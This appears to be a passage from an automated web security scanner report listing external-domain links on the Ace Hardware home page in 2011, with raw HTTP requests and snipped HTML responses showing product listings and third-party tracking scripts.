http://ace.imageg.net/cms_widgets/20/33/203388_assets/110786_TwitterYouTubeSpot.jpg
http://ace.imageg.net/cms_widgets/44/10/441077_assets/homepagebb.jpg
http://ace.imageg.net/cms_widgets/46/44/464447_assets/AceRewardsVisa_Widget.png
http://ace.imageg.net/cms_widgets/47/32/473257_assets/static_114332.png
http://ace.imageg.net/cms_widgets/86/86/86861_assets/ace_199x53_freests.gif
http://ace.imageg.net/css/DF_ACE_main.css
http://ace.imageg.net/css/PG_ACE_home.css
http://ace.imageg.net/css/WIZ_ACE_topNav.css
http://ace.imageg.net/favicon.ico
http://ace.imageg.net/graphics/product_images/pACE-1202036th.gif
http://ace.imageg.net/graphics/product_images/pACE-1202039th.gif
http://ace.imageg.net/graphics/product_images/pACE-958748th.gif
http://ace.imageg.net/graphics/product_images/pACE3-10335417th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-5340378th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-6778856th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-6932339_group_th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-6935410th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-8996103th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-9288743th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-9407041th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-9503764th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-9554133th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-9554207th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-9583936th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-9583938th.jpg
http://ace.imageg.net/images/bgCap.gif
http://ace.imageg.net/images/breadcrumb_ad.gif
http://ace.imageg.net/images/ftr_wood.gif
http://ace.imageg.net/images/home_projectsandsolutionsSmall.jpg
http://ace.imageg.net/images/home_tabs_featprods_on.gif
http://ace.imageg.net/images/home_tabs_toprated_off.gif
http://ace.imageg.net/images/home_tabs_topsellers_off.gif
http://ace.imageg.net/images/home_tabs_whatsnew_off.gif
http://ace.imageg.net/images/home_tabset_br.gif
http://ace.imageg.net/include/flashobject.js
http://ace.imageg.net/include/infozone.js
http://ace.imageg.net/include/minicart.js
http://ace.imageg.net/include/minicart_ace.css
http://ace.imageg.net/include/swfobject.js
http://ace.imageg.net/include/tabset.js
http://ace.imageg.net/include/tabset_home.js
http://ace.imageg.net/js/DF_main.js
http://ace.imageg.net/js/PG_ACE_emailSignupToggle.js
http://ace.imageg.net/js/WIZ_TempTizzy.js
http://ace.imageg.net/js/WIZ_topNav.js
http://ace.imageg.net/js/gomez-gtagb4_noobj.js
http://ace.imageg.net/pwr/engine/js/full.js
http://acehardware.shoplocal.com/acehardwarecircular/new_user_entry.aspx
http://ad.doubleclick.net/activity;src=1048698;type=aceha631;cat=homep154;ord=1;num=1?
http://facebook.com/acehardware
http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=;ord=1;num=82078877?
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=acehrdwre_gsi_cs=1&betq=970=349145
http://media.gsimedia.net/tg/gsiutt/store133.js
http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3167
http://twitter.com/acehardware
http://www.acerewardsvisa.com/PLA6
http://www.myace.com/
http://www.scanalert.com/RatingVerify?ref=www.acehardware.com
http://youtube.com/acehardware
https://dsa.csdata1.com/data/js/9027093/csgather.js
https://images.scanalert.com/meter/www.acehardware.com/31.gif

Request

GET /home/index.jsp?rdir=1A HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305511353374}; JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1305544630340%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DMy%25252520Account%2525253A%25252520Sign-In%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.acehardware.com/images/checkout/cart2_signin.gif%252526ot%25253DIMAGE%3B; fsr.a=1305542835024; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.1.10.1305542835

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:16 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 108016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <script type="text/javascript" src="http://ACE.imageg.net/include/flashobject.js"></script>
<script type="text/javascript" src="http://ACE.imageg.net/include/swfobject.js"></script>

   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/include/infozone.js"></script>
...[SNIP]...
<noscript><img class="dN" src="http://ad.doubleclick.net/activity;src=1048698;type=aceha631;cat=homep154;ord=1;num=1?" width="1" height="1" alt="" border="0" /></noscript>

<script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_TempTizzy.js"></script>
...[SNIP]...
<div id="siteBg">


                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
<link rel="stylesheet" href="http://ACE.imageg.net/include/minicart_ace.css">
<div id="minicart" class="minicart_ace">
...[SNIP]...
<a href="https://www.acehardware.com/acerewards/index.jsp?step=aceRewardsHub"><img id="rightitem" src="http://ACE.imageg.net/images/breadcrumb_ad.gif" width="206" height="44" alt="" border="0" /></a>
...[SNIP]...
</a><img border="0" name="cms_image84006029" src="http://ACE.imageg.net/cms_widgets/47/32/473257_assets/static_114332.png" height="261" width="572" align="Default" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL0');" /></div>
...[SNIP]...
<div id="ace_home_2" style="width:572px;border:0px;overflow:hidden;">

<img border="0" name="HomepageBrandBar_032511" src="http://ACE.imageg.net/cms_widgets/44/10/441077_assets/homepagebb.jpg" height="53" width="572" align="Default" valign="Default" usemap="#HomepageBrandBarMap" /><map name="HomepageBrandBarMap">
...[SNIP]...
</div>


                               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset_home.js"></script>

               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset.js"></script>
...[SNIP]...
<a href="javascript:void(0);" onclick="omni_TabClick('Home:Featured Products');turnOnTab(0);" onmouseover="imgOn('tab0');" onmouseout="imgOff('tab0');" class="cP"><img id="tab0" class="fL dB pR t1 cP" src="http://ACE.imageg.net/images/home_tabs_featprods_on.gif" width="132" height="23" alt="Featured Products" border="0" /></a>


   <a href="javascript:void(0);" onclick="omni_TabClick('Home:Top Sellers');turnOnTab(1);" onmouseover="imgOn('tab1');" onmouseout="imgOff('tab1');"><img id="tab1" class="fL dB" src="http://ACE.imageg.net/images/home_tabs_topsellers_off.gif" width="95" height="23" alt="Top Sellers" border="0" /></a>


   <a href="javascript:void(0);" onclick="omni_TabClick('Home:Top Rated');turnOnTab(2);" onmouseover="imgOn('tab2');" onmouseout="imgOff('tab2');"><img id="tab2" class="fL dB" src="http://ACE.imageg.net/images/home_tabs_toprated_off.gif" width="84" height="23" alt="Top Rated" border="0" /></a>


   <a href="javascript:void(0);" onclick="omni_TabClick('Home:Whats New');turnOnTab(3);" onmouseover="imgOn('tab3');" onmouseout="imgOff('tab3');"><img id="tab3" class="fL dB" src="http://ACE.imageg.net/images/home_tabs_whatsnew_off.gif" width="93" height="23" alt="What's New" border="0" /></a>
...[SNIP]...
cation.href='/product/index.jsp?productId=11560715&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Living Accents. LeClaire 5-Piece Fire Chat Set');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9288743th.jpg"></a>
...[SNIP]...
duct/index.jsp?productId=11193066&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Scotts® Nature Scapes Brown Color Enhanced Mulch (88652795)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9503764th.jpg"></a>
...[SNIP]...
.location.href='/product/index.jsp?productId=3832732&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Fiskars. 58 Gal Salsa Rain Barrel (59988935)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-6778856th.jpg"></a>
...[SNIP]...
on.href='/product/index.jsp?productId=10918193&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Weber. Genesis. EP-330 Propane Gas Grill (6531301)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-8996103th.jpg"></a>
...[SNIP]...
indow.location.href='/product/index.jsp?productId=3332071&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Ducane. Affinity. 3100 Propane Gas Grill (31731101)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-5340378th.jpg"></a>
...[SNIP]...
onClick="window.location.href='/product/index.jsp?productId=3948588&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Living Accents. Kingsley Patio Collection');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-6932339_group_th.jpg"></a>
...[SNIP]...
2" onClick="window.location.href='/product/index.jsp?productId=11133082&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Living Accents. 3-Person Canopy Swing');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9407041th.jpg"></a>
...[SNIP]...
nClick="window.location.href='/product/index.jsp?productId=3914716&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Living Accents. Lexington Steel Park Bench');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-6935410th.jpg"></a>
...[SNIP]...
onClick="window.location.href='/product/index.jsp?productId=11228241&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Flo N' Go® Superflo Siphon/Pump (08339)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9583936th.jpg"></a>
...[SNIP]...
onClick="window.location.href='/product/index.jsp?productId=11227922&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Union® 9in Half Mood Turf Edger (61102)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9583938th.jpg"></a>
...[SNIP]...
="window.location.href='/product/index.jsp?productId=11221138&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Rockwell® Blade Runner with Wall Mount (RK7321)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9554133th.jpg"></a>
...[SNIP]...
ow.location.href='/product/index.jsp?productId=11221117&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Twin Draft Guard® 8x15in Magnetic Vent Covers (60260)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9554207th.jpg"></a>
...[SNIP]...
43685" onClick="window.location.href='/product/index.jsp?productId=11643685&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:WD-40® 12oz Smart Straw - 12 Pack');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-10335417th.jpg"></a>
...[SNIP]...
productId=11636779" onClick="window.location.href='/product/index.jsp?productId=11636779&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:WD-40® 1gal - 4 Pack');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE-1202036th.gif"></a>
...[SNIP]...
77" onClick="window.location.href='/product/index.jsp?productId=11636777&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:WD-40® 3oz Spray Lubricant - 12 Pack');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE-1202039th.gif"></a>
...[SNIP]...
771" onClick="window.location.href='/product/index.jsp?productId=11636771&clickFrom=Home%3AWhats+New';return false;" onclick="omni_TabClick('Home:Whats New:3-In-1® 3oz Household Oil - 12 Pack');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE-958748th.gif"></a>
...[SNIP]...


   <img class="fR dB pR t1 l1" src="http://ACE.imageg.net/images/home_tabset_br.gif" width="12" height="13" alt="" border="0" />
   <div class="cB">
...[SNIP]...
</a><img border="0" name="AceRewardsVisaLower_042611" src="http://ACE.imageg.net/cms_widgets/46/44/464447_assets/AceRewardsVisa_Widget.png" height="53" width="572" align="Default" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL2');" /></div>
...[SNIP]...
</a><img border="0" name="Ship to Store Logo 100108 2" src="http://ACE.imageg.net/cms_widgets/86/86/86861_assets/ace_199x53_freests.gif" height="53" width="199" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL3');" /></div>
...[SNIP]...
</a><img border="0" name="Rebate 11-24-08" src="http://ACE.imageg.net/cms_widgets/10/34/103412_assets/rebatecenter.gif" height="53" width="199" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL4');" /></div>
...[SNIP]...
<div id="homePandS" class="h250 mB10">
                   <img src="http://ACE.imageg.net/images/home_projectsandsolutionsSmall.jpg" alt="" width="199" height="238" border="0" usemap="#home_projectsandsolutions" />
                   <map name="home_projectsandsolutions">
...[SNIP]...
<div id="ace_home_5" style="width:199px;border:0px;overflow:hidden;">
<img border="0" name="social_media_199x53" src="http://ACE.imageg.net/cms_widgets/20/33/203388_assets/110786_TwitterYouTubeSpot.jpg" height="53" width="199" align="Default" valign="Default" usemap="#social_map" /><map name="social_map"><area shape="rect" coords="0,0,67,53" title="Facebook" href="http://facebook.com/acehardware"/><area shape="rect" coords="67,0,122,53" title="Twitter" href="http://twitter.com/acehardware"/><area shape="rect" coords="122,0,199,53" title="YouTube" href="http://youtube.com/acehardware"/></map>
...[SNIP]...
<div class="fL pLR12 pB6 bR1_c5"><a href="http://WWW.ACEREWARDSVISA.COM/PLA6" class="stdRed fB f9" target="_blank">Ace Rewards Visa</a>
...[SNIP]...
<div class="fL pLR12 pB6"><a href="http://acehardware.shoplocal.com/acehardwarecircular/new_user_entry.aspx" class="stdRed fB f9">Shop Our Ad</a>
...[SNIP]...
</div>
       <img class="dB" src="http://ACE.imageg.net/images/ftr_wood.gif" width="778" height="22" alt="" border="0" />
       <div class="mLRa" style="width: 671px;">
...[SNIP]...
<div class="fL pLR6 pT6 bR1_c5"><a href="http://www.myace.com" class="stdGray f9" target="_blank">Own an Ace Store</a>
...[SNIP]...
<td valign=top><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=acehrdwre_gsi_cs=1&betq=970=349145" width="1" height="1" border="0"></td>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">

<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=;ord=1;num=82078877?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...
<div id="trackingPixels" style="visibility:hidden">


           <iframe src='http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3167' scrolling='no' width='1' height='1' marginheight='0' marginwidth='0' frameborder='0'></iframe>
...[SNIP]...


<script src="http://media.gsimedia.net/tg/gsiutt/store133.js"></script>
...[SNIP]...


   <img class="dB" src="http://ACE.imageg.net/images/bgCap.gif" width="812" height="23" alt="" border="0" />

   
...[SNIP]...
<div class="w65 mLRa"><a target="_blank" href="http://www.scanalert.com/RatingVerify?ref=www.acehardware.com"><img src="https://images.scanalert.com/meter/www.acehardware.com/31.gif" alt="HACKER SAFE certified sites prevent over 99% of hacker crime." oncontextmenu="alert('Copying Prohibited by Law - HACKER SAFE is a Trademark of ScanAlert'); return false;" align="absmiddle" border="0" height="38" width="65" /></a>
...[SNIP]...

17.25. http://www.acehardware.com/home/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.acehardware.com
Path:	/home/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.acehardware.com/home/index.jsp?rdir=1A

The response contains the following links to other domains:

http://ace.imageg.net/cms_widgets/10/34/103412_assets/rebatecenter.gif
http://ace.imageg.net/cms_widgets/20/33/203388_assets/110786_TwitterYouTubeSpot.jpg
http://ace.imageg.net/cms_widgets/44/10/441077_assets/homepagebb.jpg
http://ace.imageg.net/cms_widgets/46/44/464447_assets/AceRewardsVisa_Widget.png
http://ace.imageg.net/cms_widgets/47/32/473257_assets/static_114332.png
http://ace.imageg.net/cms_widgets/86/86/86861_assets/ace_199x53_freests.gif
http://ace.imageg.net/css/DF_ACE_main.css
http://ace.imageg.net/css/PG_ACE_home.css
http://ace.imageg.net/css/WIZ_ACE_topNav.css
http://ace.imageg.net/favicon.ico
http://ace.imageg.net/graphics/product_images/pACE-1202036th.gif
http://ace.imageg.net/graphics/product_images/pACE-1202039th.gif
http://ace.imageg.net/graphics/product_images/pACE-958748th.gif
http://ace.imageg.net/graphics/product_images/pACE3-10335417th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-5340378th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-6778856th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-6932339_group_th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-6935410th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-8996103th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-9288743th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-9407041th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-9503764th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-9554133th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-9554207th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-9583936th.jpg
http://ace.imageg.net/graphics/product_images/pACE3-9583938th.jpg
http://ace.imageg.net/images/bgCap.gif
http://ace.imageg.net/images/breadcrumb_ad.gif
http://ace.imageg.net/images/ftr_wood.gif
http://ace.imageg.net/images/home_projectsandsolutionsSmall.jpg
http://ace.imageg.net/images/home_tabs_featprods_on.gif
http://ace.imageg.net/images/home_tabs_toprated_off.gif
http://ace.imageg.net/images/home_tabs_topsellers_off.gif
http://ace.imageg.net/images/home_tabs_whatsnew_off.gif
http://ace.imageg.net/images/home_tabset_br.gif
http://ace.imageg.net/include/flashobject.js
http://ace.imageg.net/include/infozone.js
http://ace.imageg.net/include/minicart.js
http://ace.imageg.net/include/minicart_ace.css
http://ace.imageg.net/include/swfobject.js
http://ace.imageg.net/include/tabset.js
http://ace.imageg.net/include/tabset_home.js
http://ace.imageg.net/js/DF_main.js
http://ace.imageg.net/js/PG_ACE_emailSignupToggle.js
http://ace.imageg.net/js/WIZ_TempTizzy.js
http://ace.imageg.net/js/WIZ_topNav.js
http://ace.imageg.net/js/gomez-gtagb4_noobj.js
http://ace.imageg.net/pwr/engine/js/full.js
http://acehardware.shoplocal.com/acehardwarecircular/new_user_entry.aspx
http://ad.doubleclick.net/activity;src=1048698;type=aceha631;cat=homep154;ord=1;num=1?
http://facebook.com/acehardware
http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=;ord=1;num=45060074?
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=acehrdwre_gsi_cs=1&betq=970=349145
http://media.gsimedia.net/tg/gsiutt/store133.js
http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3167
http://twitter.com/acehardware
http://www.acerewardsvisa.com/PLA6
http://www.myace.com/
http://www.scanalert.com/RatingVerify?ref=www.acehardware.com
http://youtube.com/acehardware
https://dsa.csdata1.com/data/js/9027093/csgather.js
https://images.scanalert.com/meter/www.acehardware.com/31.gif

Request

GET /home/index.jsp?rdir=1A HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305511353374}; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DMy%2520Account%253A%2520Sign-In%7C1305544625524%3B; JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:06 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 107919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <script type="text/javascript" src="http://ACE.imageg.net/include/flashobject.js"></script>
<script type="text/javascript" src="http://ACE.imageg.net/include/swfobject.js"></script>

   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/include/infozone.js"></script>
...[SNIP]...
<noscript><img class="dN" src="http://ad.doubleclick.net/activity;src=1048698;type=aceha631;cat=homep154;ord=1;num=1?" width="1" height="1" alt="" border="0" /></noscript>

<script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_TempTizzy.js"></script>
...[SNIP]...
<div id="siteBg">


                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
<link rel="stylesheet" href="http://ACE.imageg.net/include/minicart_ace.css">
<div id="minicart" class="minicart_ace">
...[SNIP]...
<a href="https://www.acehardware.com/acerewards/index.jsp?step=aceRewardsHub"><img id="rightitem" src="http://ACE.imageg.net/images/breadcrumb_ad.gif" width="206" height="44" alt="" border="0" /></a>
...[SNIP]...
</a><img border="0" name="cms_image84006029" src="http://ACE.imageg.net/cms_widgets/47/32/473257_assets/static_114332.png" height="261" width="572" align="Default" valign="Default" style="cursor:pointer" onClick="javascript:invokeAnchor('linkURL0');" /></div>
...[SNIP]...
<div id="ace_home_2" style="width:572px;border:0px;overflow:hidden;">

<img border="0" name="HomepageBrandBar_032511" src="http://ACE.imageg.net/cms_widgets/44/10/441077_assets/homepagebb.jpg" height="53" width="572" align="Default" valign="Default" usemap="#HomepageBrandBarMap" /><map name="HomepageBrandBarMap">
...[SNIP]...
</div>


                               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset_home.js"></script>

               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset.js"></script>
...[SNIP]...
<a href="javascript:void(0);" onclick="omni_TabClick('Home:Featured Products');turnOnTab(0);" onmouseover="imgOn('tab0');" onmouseout="imgOff('tab0');" class="cP"><img id="tab0" class="fL dB pR t1 cP" src="http://ACE.imageg.net/images/home_tabs_featprods_on.gif" width="132" height="23" alt="Featured Products" border="0" /></a>


   <a href="javascript:void(0);" onclick="omni_TabClick('Home:Top Sellers');turnOnTab(1);" onmouseover="imgOn('tab1');" onmouseout="imgOff('tab1');"><img id="tab1" class="fL dB" src="http://ACE.imageg.net/images/home_tabs_topsellers_off.gif" width="95" height="23" alt="Top Sellers" border="0" /></a>


   <a href="javascript:void(0);" onclick="omni_TabClick('Home:Top Rated');turnOnTab(2);" onmouseover="imgOn('tab2');" onmouseout="imgOff('tab2');"><img id="tab2" class="fL dB" src="http://ACE.imageg.net/images/home_tabs_toprated_off.gif" width="84" height="23" alt="Top Rated" border="0" /></a>


   <a href="javascript:void(0);" onclick="omni_TabClick('Home:Whats New');turnOnTab(3);" onmouseover="imgOn('tab3');" onmouseout="imgOff('tab3');"><img id="tab3" class="fL dB" src="http://ACE.imageg.net/images/home_tabs_whatsnew_off.gif" width="93" height="23" alt="What's New" border="0" /></a>
...[SNIP]...
cation.href='/product/index.jsp?productId=11560715&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Living Accents. LeClaire 5-Piece Fire Chat Set');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9288743th.jpg"></a>
...[SNIP]...
duct/index.jsp?productId=11193066&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Scotts® Nature Scapes Brown Color Enhanced Mulch (88652795)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9503764th.jpg"></a>
...[SNIP]...
.location.href='/product/index.jsp?productId=3832732&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Fiskars. 58 Gal Salsa Rain Barrel (59988935)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-6778856th.jpg"></a>
...[SNIP]...
on.href='/product/index.jsp?productId=10918193&clickFrom=Home%3AFeatured+Products';return false;" onclick="omni_TabClick('Home:Featured Products:Weber. Genesis. EP-330 Propane Gas Grill (6531301)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-8996103th.jpg"></a>
...[SNIP]...
indow.location.href='/product/index.jsp?productId=3332071&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Ducane. Affinity. 3100 Propane Gas Grill (31731101)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-5340378th.jpg"></a>
...[SNIP]...
onClick="window.location.href='/product/index.jsp?productId=3948588&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Living Accents. Kingsley Patio Collection');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-6932339_group_th.jpg"></a>
...[SNIP]...
2" onClick="window.location.href='/product/index.jsp?productId=11133082&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Living Accents. 3-Person Canopy Swing');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9407041th.jpg"></a>
...[SNIP]...
nClick="window.location.href='/product/index.jsp?productId=3914716&clickFrom=Home%3ATop+Sellers';return false;" onclick="omni_TabClick('Home:Top Sellers:Living Accents. Lexington Steel Park Bench');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-6935410th.jpg"></a>
...[SNIP]...
onClick="window.location.href='/product/index.jsp?productId=11228241&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Flo N' Go® Superflo Siphon/Pump (08339)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9583936th.jpg"></a>
...[SNIP]...
onClick="window.location.href='/product/index.jsp?productId=11227922&clickFrom=Home%3ATop+Rated';return false;" onclick="omni_TabClick('Home:Top Rated:Union® 9in Half Mood Turf Edger (61102)');" ><img src="http://ACE.imageg.net/graphics/product_images/pACE3-9583938th.jpg"></a>
...[SNIP]...
